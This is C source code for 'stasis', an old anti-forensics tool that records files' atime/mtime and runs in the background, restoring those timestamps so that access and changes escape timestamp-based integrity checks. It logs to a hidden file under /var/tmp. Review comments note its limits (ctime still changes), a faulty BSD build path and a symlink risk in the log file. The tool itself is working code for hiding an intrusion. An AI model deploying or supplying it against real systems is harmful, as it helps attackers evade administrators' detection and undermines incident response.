Stasis is a tool to fool atime/mtime timestamp checking. It records the timestamp of files, then periodically finds atime/mtime changes and restores the old timestamps, as if the files were never accessed / changed.
eb63609efc1350e5ecc18faffda1b59339dc10d5a460127fa971feb32673d225
/*
stasis.c - timestamp suspension tool - 01/00 by Mixter
this is a simple file monitoring tool that records the timestamp of
files, then periodically finds atime/mtime changes and restores the
old timestamps, as if the files were never accessed / changed.
this shows that atime/mtime monitoring on its own is not very foolproof, and can
be used to fool some lame admins and script kiddies' atime/mtime scan
based protection scripts for eggdrop tcl and other programs easily.
caveat: utime()/utimes() only set atime and mtime. On POSIX systems the
call itself marks the inode's ctime, which cannot be set from user space,
so a checker that also compares ctime (or content hashes), or that happens
to run inside the MINUTES_DELAY window, still sees the change.
compile with -DBSD if your system doesn't have working utime()... (caveat: the
BSD path hands utimes() a single struct timeval with mtime stuffed into tv_usec,
whereas utimes() expects an array of two struct timeval — atime then mtime, seconds
in tv_sec — so verify that build before trusting it)
#include <std_disclaimer.h>
#include <lame_advertisement.h>
http://mixter.void.ru / http://mixtersecurity.tripod.com
*/
#define MINUTES_DELAY 3 /* delay between file scans */
#define LOGFILE "/var/tmp/.s3kr1t" /* optional to define */
#define DELAY MINUTES_DELAY * 60
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <utime.h>
#include <sys/stat.h>
#include <sys/types.h>
#ifndef BSD /* OS specific utime functions */
#define UTIME_ENT struct utimbuf
#define UTIME_ATIME actime
#define UTIME_MTIME modtime
#define UTIME_F utime
#else
#include <malloc.h>
#include <sys/time.h>
#define UTIME_ENT struct timeval
#define UTIME_ATIME tv_sec
#define UTIME_MTIME tv_usec
#define UTIME_F utimes
#endif
#ifdef LOGFILE
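/*
 * Append "a b" as one line to LOGFILE.
 *
 * Best-effort diagnostic trail: if the log cannot be opened the message is
 * dropped instead of passing a NULL FILE * to fprintf() as the original did.
 * The write itself is not checked either.
 *
 * NOTE(review): LOGFILE is a fixed name under /var/tmp, a world-writable
 * directory, and fopen(..., "a") follows symlinks. If this ever runs with
 * elevated privileges, a symlink pre-placed at that path redirects the
 * appends to an arbitrary file.
 */
void
log (char *a, char *b)
{
  FILE *out = fopen (LOGFILE, "a");

  if (out == NULL)
    return;
  fprintf (out, "%s %s\n", a, b);
  fclose (out);
}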
#endif
/* One monitored path together with the atime/mtime recorded for it at
   start-up. Nodes form a singly linked list through `next`; the list is
   NULL-terminated. */
struct fhash
{
  char filename[255];   /* path as read from the list file, NUL-terminated */
  UTIME_ENT timebuf;    /* recorded atime/mtime, in the layout UTIME_F() takes */
  struct fhash *next;
};

/* Head of the list, and a scratch cursor used when walking it. */
struct fhash *fstart;
struct fhash *fcurr;
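/*
 * Print the usage text to stderr and exit with a non-zero status.
 * The original exited 0 here, which made a usage error look like success
 * to a calling shell; the suggested find(1) command was also wrong
 * ("-type -f").
 */
static void
usage (const char *prog)
{
  fprintf (stderr, "Usage: %s <file list>\n", prog);
  fprintf (stderr, "Make a file list by typing something like: find / -type f > list.txt\n");
  exit (1);
}

/*
 * Build a list node for `path`, recording its current atime/mtime.
 * Returns the new node, or NULL (after logging when LOGFILE is defined)
 * if the path does not fit the fixed filename buffer or cannot be
 * lstat()ed. Allocation failure is fatal.
 *
 * lstat() does not follow symlinks, while UTIME_F() (utime/utimes) does
 * on typical systems, so for a symlink entry the recorded and the
 * restored timestamps may belong to different inodes.
 */
static struct fhash *
record_file (char *path)
{
  struct stat st;
  struct fhash *node;
  size_t len = strlen (path);

  if (len >= sizeof node->filename)
    {
#ifdef LOGFILE
      log ("ignoring over-long path: ", path);
#endif
      return NULL;
    }
  if (lstat (path, &st) != 0)
    {
#ifdef LOGFILE
      log ("ignoring non existant file: ", path);
#endif
      return NULL;
    }
  /* calloc() so `next` starts out NULL: the original malloc()ed the node,
     left `next` uninitialised, and later free()d that garbage pointer. */
  node = calloc (1, sizeof *node);
  if (node == NULL)
    {
      perror ("calloc");
      exit (1);
    }
  memcpy (node->filename, path, len + 1);   /* len < sizeof filename, checked above */
  node->timebuf.UTIME_ATIME = st.st_atime;
  node->timebuf.UTIME_MTIME = st.st_mtime;
  return node;
}

/*
 * Walk the list once and put back the recorded atime/mtime on every entry
 * whose current values differ. Entries that can no longer be lstat()ed are
 * logged and skipped; they stay in the list, so a file that reappears
 * under the same name is handled on a later pass.
 */
static void
revert_changes (struct fhash *head)
{
  struct stat st;
  struct fhash *node;

  for (node = head; node != NULL; node = node->next)
    {
      int atime_changed, mtime_changed;

      if (lstat (node->filename, &st) != 0)
        {
#ifdef LOGFILE
          log ("file has been deleted: ", node->filename);
#endif
          continue;
        }
      atime_changed = node->timebuf.UTIME_ATIME != st.st_atime;
      mtime_changed = node->timebuf.UTIME_MTIME != st.st_mtime;
      if (!atime_changed && !mtime_changed)
        continue;
#ifdef LOGFILE
      if (atime_changed)
        log ("atime change reverted: ", node->filename);
      if (mtime_changed)
        log ("mtime change reverted: ", node->filename);
#endif
      /* One call restores both fields; the original issued it twice when
         both had changed and never looked at the result. */
      if (UTIME_F (node->filename, &node->timebuf) != 0)
        {
#ifdef LOGFILE
          log ("could not restore timestamps for: ", node->filename);
#endif
        }
    }
}

/*
 * Entry point. argv[1] names a file holding one path per line. Every path
 * that can be lstat()ed has its atime/mtime recorded; the process then
 * forks, the parent returns 0, and the child sleeps DELAY seconds between
 * passes of revert_changes() forever.
 *
 * NOTE(review): utime()/utimes() set only atime and mtime. On POSIX
 * systems the call itself marks the inode's ctime, which user space
 * cannot set, so a checker that also compares ctime still sees the
 * change — as does one that runs inside the DELAY window.
 */
int
main (int argc, char **argv)
{
  const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "stasis";
  FILE *list;
  char buffer[512];
  struct fhash *tail = NULL;
  int counter = 0;
  pid_t pid;

  if (argc != 2)
    usage (prog);
  list = fopen (argv[1], "r");
  if (list == NULL)
    {
      perror (argv[1]);
      usage (prog);
    }

  /* read filename timestamps */
  fstart = NULL;
  while (fgets (buffer, sizeof buffer, list) != NULL)
    {
      struct fhash *node;
      char *nl = strchr (buffer, '\n');

      if (nl == NULL && !feof (list))
        {
          /* Over-long line: discard its tail so it is not read back as a
             separate path on the next iteration. */
          int c;
          while ((c = getc (list)) != EOF && c != '\n')
            ;
#ifdef LOGFILE
          log ("ignoring over-long line starting: ", buffer);
#endif
          continue;
        }
      /* Strip the newline only if one is present; the original blindly
         dropped the last character, which mangled a final line that had
         no trailing newline. */
      if (nl != NULL)
        *nl = '\0';
      if (buffer[0] == '\0')
        continue;

      node = record_file (buffer);
      if (node == NULL)
        continue;
      if (tail == NULL)
        fstart = node;
      else
        tail->next = node;
      tail = node;
      counter++;
    }
  fclose (list);

  if (counter == 0)
    {
      fprintf (stderr, "%s: nothing to monitor\n", prog);
      return 1;
    }
  printf ("Going into background, monitoring %d files\n", counter);
  /* Flush before fork() so the child does not carry a copy of pending
     stdio output into its endless loop. */
  fflush (stdout);

  pid = fork ();
  if (pid < 0)
    {
      perror ("fork");
      return 1;
    }
  if (pid > 0)
    return 0;   /* parent: the child keeps running */

  /* comparison routine (child) */
  for (;;)
    {
      sleep (DELAY);
      revert_changes (fstart);
    }
}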